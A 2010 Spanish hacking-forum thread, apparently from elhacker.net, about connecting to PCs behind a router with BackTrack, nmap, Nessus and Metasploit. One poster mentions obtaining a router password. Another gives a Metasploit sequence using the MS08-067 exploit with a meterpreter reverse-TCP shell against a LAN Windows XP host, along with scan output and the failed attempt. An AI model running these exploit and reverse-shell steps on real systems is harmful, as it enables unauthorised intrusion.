Como conectar 2 pc's atraves de router

Iniciado por Aiouek, 16 Agosto 2010, 15:22 PM

0 Miembros y 4 Visitantes están viendo este tema.

Aiouek

Buenas, lo del backtrack me lo descargare mas adelante desde otro sitio ya que donde estoy ahora la linea es lenta  y no quiero cogerle todo el ancho de banda.
Lo pase todo a linux, solo el nmap y el meta, y ya hare pruebas con mi equipo para divertirme un rato antes de hacer chorradas :P

Asique dentro de pocos dias abriré de nuevo este post, en una o 2 semanas, ¡gracias!

Por cierto, ¿el backtrack se puede instalar en ubuntu no? vamos que no es un programa estilo wifiway, que puede ejecutarse como un programa normal desde ubuntu....

¿Que tarjetas son las mejores para esto? Lei que son las atheros, ¿pero dentro de las atheros cual es la mas recomendable?

Saludos!

cpu2

Cita de: Aiouek en 21 Agosto 2010, 18:38 PM
Por cierto, ¿el backtrack se puede instalar en ubuntu no? vamos que no es un programa estilo wifiway, que puede ejecutarse como un programa normal desde ubuntu....
No, Backtrack no se puede instalar dentro de ubuntu porque es un sistema operativo como Wifiway, lo puedes poner de livedvd o sistema base, pero yo te recomiendo que te pongas ubuntu o la distribucion que kieras y le metas los programas que necesites.

Cita de: Aiouek en 21 Agosto 2010, 18:38 PM
¿Que tarjetas son las mejores para esto? Lei que son las atheros, ¿pero dentro de las atheros cual es la mas recomendable?
Yo habia pensado en esta
http://foro.elhacker.net/materiales_y_equipos/iquestque_piensan_de_este_equipo-t302244.0.html
pero nose si funcara bien, nadie respondio.

Un saludo

Aiouek

Buenas, aqui te pongo lo que me sale con root@Terminal:~# nmap 192.168.1.1/24 -O:
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-26 20:02 CEST
Interesting ports on 192.168.1.1:
Not shown: 996 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
23/tcp open  telnet
80/tcp open  http
MAC Address: 64:68:0C:XX:XX:XX (Unknown)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.15 - 2.6.26
Network Distance: 2 hop

All 1000 scanned ports on 192.168.1.33 are closed
MAC Address: 00:E0:98:XX:XX:XX (AboCom Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hop

All 1000 scanned ports on 192.168.1.34 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 12.12 seconds

Y con nmap 192.168.1.1/24 "que los 1000 puertos escaneados estan cerrados"..

Estoy bajando el backtrack, en un rato subo los resultados. Saludos.


pepewarez


buenas a todos

Los felicito a todos ,se aprende mucho leyendo lo que estan escribiendo ,el uno preguntando y el otro respondiendo .

Ahora hay algo que no me cuadra .
como pueden ver las PC que estan detras de un router con el NMAP , si la unica manera de ver las PC que forman parte de esa LAN escondidas detras del router es formando parte de la lan interna del router ,pero no desde afuera

Desde afuera solo veria la MAc del router y escaneo de puertos y etc pero no las PC que estan detras

La manera seria con DMZ , Virtual AP, NAT , desvio del DNS ,etc

??? Estoy equivocado acaso o no 


Aiouek

Buenas a todos, yo me saqué la pass del router, me conecto al router y apartir de ahi hago nmap porque uso el wifiway para ese primer paso que es un poco mas rapido  :P...

Bueno estoy en backtrack y he llegado a un punto donde estoy estancadisimo:
Ya en startx abro la konsola, y hago este procedimiento:
iwlist wlan0 scan (essid, mode master, enc on)
ifconfig wlan0 down
iwconfig wlan0 mode managed, porque no me soporta mode master [Error 8B2A creo recordar]
ifconfig wlan0 up
iwconfig wlan0 key s:key-en-ascii
iwconfig wlan0 essid ESSID
dhclient wlan0 (ya que no tengo instalado el dhcpcd y al no tener internet/es live-cd)

Al hacer el ultimo paso, dhclient, parece que hace una especie de ping mostrando los milisengudos y al +-decimo intento me saca un error diciendo que no recibe tal dato y ahi se para.
El error que veo es lo del mode ya que me indica master y yo al no poder poner el master pongo managed. He leido que si eso lo que me pasa es cosa del driver que no lo soporta, ¿entonces que puedo hacer?

Saludos ;)

cpu2

Buenas, en el nmap como se ve tiene todo cerrado, como dice la guia usa el wireshark, para ver el trafico y aver que se cuece, y la otra seria refinar mas el mapeo, no te puedo ayudar más, porque no estoi en mi pc.

Cita de: Aiouek en 28 Agosto 2010, 13:46 PM
Buenas a todos, yo me saqué la pass del router, me conecto al router y apartir de ahi hago nmap porque uso el wifiway para ese primer paso que es un poco mas rapido  :P...

Bueno estoy en backtrack y he llegado a un punto donde estoy estancadisimo:
Ya en startx abro la konsola, y hago este procedimiento:
iwlist wlan0 scan (essid, mode master, enc on)
ifconfig wlan0 down
iwconfig wlan0 mode managed, porque no me soporta mode master [Error 8B2A creo recordar]
ifconfig wlan0 up
iwconfig wlan0 key s:key-en-ascii
iwconfig wlan0 essid ESSID
dhclient wlan0 (ya que no tengo instalado el dhcpcd y al no tener internet/es live-cd)

Al hacer el ultimo paso, dhclient, parece que hace una especie de ping mostrando los milisengudos y al +-decimo intento me saca un error diciendo que no recibe tal dato y ahi se para.
El error que veo es lo del mode ya que me indica master y yo al no poder poner el master pongo managed. He leido que si eso lo que me pasa es cosa del driver que no lo soporta, ¿entonces que puedo hacer?

Saludos ;)

Fijo que es por el driver, dime el chip que tiene tu tarjeta, si no lo sabes haz un
lspci
Abria que ver el driver que usa, aver que se puede hacer :-\
lsmod
para conectarte puedes usar wicd del menu para que te sea mas facil, para activarlo creo que era algo asi
/etc/init.d/wicd start

Un saludo

Aiouek

#16
Buenas, ok probaré. Ahora lo estoy haciendo en un XP sp3 y no esta muy actualizado asique me imagino que en cuanto pueda hacerlo, necesito conectarme al router, saldrán mas cosillas xD
Lspci:
Host bridge: Intel Corporation Mobile 4 Series Chipset Memory Controller
Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network


Airmon-ng:
Chipset: Atheros
Driver: ath5k - [phy0]

Saludos

PD: Esto me importa pero de momento estoy haciendo todo casero y puedo conectar dos pc sin problemas.

Aiouek

#17
Buenas, usando nmap contra un XP SP3, con firewall activado y eset nod32 4.2, me dice que estan filtrados los puertos en cuestion.
Hago trampas  :laugh: y desactivo un rato el firewall, mientras nessus hace el scaneo.
Me saca varias vulnerabilidades, una en concreto alta, pero a la hora de montar todo con el meta me tira esto :O

use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.34
set LHOST 192.168.1.33
set SMBPIPE srvsvc
set EXITFUNC thread
set target 45
exploit

Resultado:
  • Started reverse handler on 192.168.1.33:4444
    [-] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
  • Exploit completed, but no session was created.

    Y al usar como payload:
    windows/vncinject/reverse_tcp
    Me dice que expiró el tiempo [con el firewall activado] y el mismo error sin el firewall.

    _________________________________________________________________________

    PD: Tengo el scan hecho por nessus y para que no meta la pata con que exploit utilizar he creado una db, lo tengo todo apunto excepto lo mas importante y esque el nessus no me genera los .neb solo me genera .nessus, .nessus (v1) y html ¿Como hago para que me saque los necesarios .neb? ¿puedo pasar cualquiera de los tres formatos que me deja a .neb?...;)


    Si a alguien se le ocurre algo estoy por aqui un rato ;)
    Saludos